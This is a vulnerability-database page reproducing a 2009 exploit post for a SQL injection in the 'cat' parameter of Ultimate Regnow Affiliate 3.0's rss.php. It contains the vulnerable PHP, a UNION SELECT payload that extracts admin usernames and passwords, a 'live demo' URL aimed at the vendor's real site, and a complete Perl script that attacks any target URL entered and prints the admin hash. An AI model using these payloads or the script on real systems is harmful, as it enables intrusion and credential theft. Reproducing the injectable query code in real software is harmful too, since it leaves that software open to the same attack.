Lucene search

URA 3.0 (cat) remote SQL injection Vulnerability

🗓️ 27 Jul 2009 00:00:00Reported by Chip D3 Bi0sType

zdt🔗 0day.today👁 26 Views

URA 3.0 (cat) remote SQL injection Vulnerability, affected cms Ultimate Regnow Affiliate, vulnerable code in rss.php, exploit code in per

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

================================================
URA 3.0 (cat) remote SQL injection Vulnerability
================================================


---------------------------------------------------
URA 3.0 (cat) remote SQL injection Vulnerability
---------------------------------------------------
 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Group         :  LatinHackTeam
 [+] Vulnerability :  SQL injection
 ###################################################

---------info Cms----------------
Name     : Ultimate Regnow Affiliate
Dowloand : http://www.phpsugar.com/ura_order.html
Web      : http://www.phpsugar.com
Price    : $27 USD
---------------------------------

vulnerable code in rss.php

........
7. $cat = $_GET['cat'];
8. 
9. if(empty($cat)) {
10 .$query = "SELECT ProductID, ProductName, VendorName, LongDesc FROM ura_items WHERE CategoryID != 0 AND CategoryID != 1 AND CategoryID != 2 ORDER BY Add_Date DESC LIMIT 10";
11. }
12. else { 
13. $query = "SELECT * FROM ura_items WHERE CategoryID = $cat ORDER BY Add_Date DESC limit $no";
14. }

.....
	
example of exploitation:
http://localhost/path/rss.php?cat=0[Sql-Code]

[Sql-Code]:
+union+select+1,concat(username,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ura_settings/*

live Demo: 
http://www.phpsugar.com/ura_demo/rss.php?cat=0+union+select+1,concat(username,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ura_settings/*

.....

#!/usr/bin/perl -w
########################################
#[+] Author : Chip D3 Bi0s
#[+] Contact: chipdebios[alt+64]gmail.com 
########################################
print "\t\t--------------------------------------------------\n\n";
print "\t\t|                  ---|Chip D3 Bi0s|---           |\n\n";
print "\t\t---------------------------------------------------\n\n";
print "\t\t|URA 3.0 (cat) remote SQL injection Vulnerability |  \n\n";
print "\t\t---------------------------------------------------\n\n";
use LWP::UserAgent;
print "\nEnter url of vuln site [http://wwww.example.com/path]: ";
chomp(my $target=<STDIN>);
$column_name="concat(0x215F,username,char(58),pass,0x215F)";
$table_name="ura_settings";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "/rss.php?cat=0+union+select+1,".$column_name.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from/**/".$table_name."/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if($answer =~ /!_(.+?)!_/i)
{
     print "\n[+] Admin Hash : $1\n\n";
     print "> Exploit done! <\n\n";

}


else{print "\n> Exploit failed! <\n";
}




#  0day.today [2018-04-06]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

27 Jul 2009 00:00Current

7.1High risk

Vulners AI Score7.1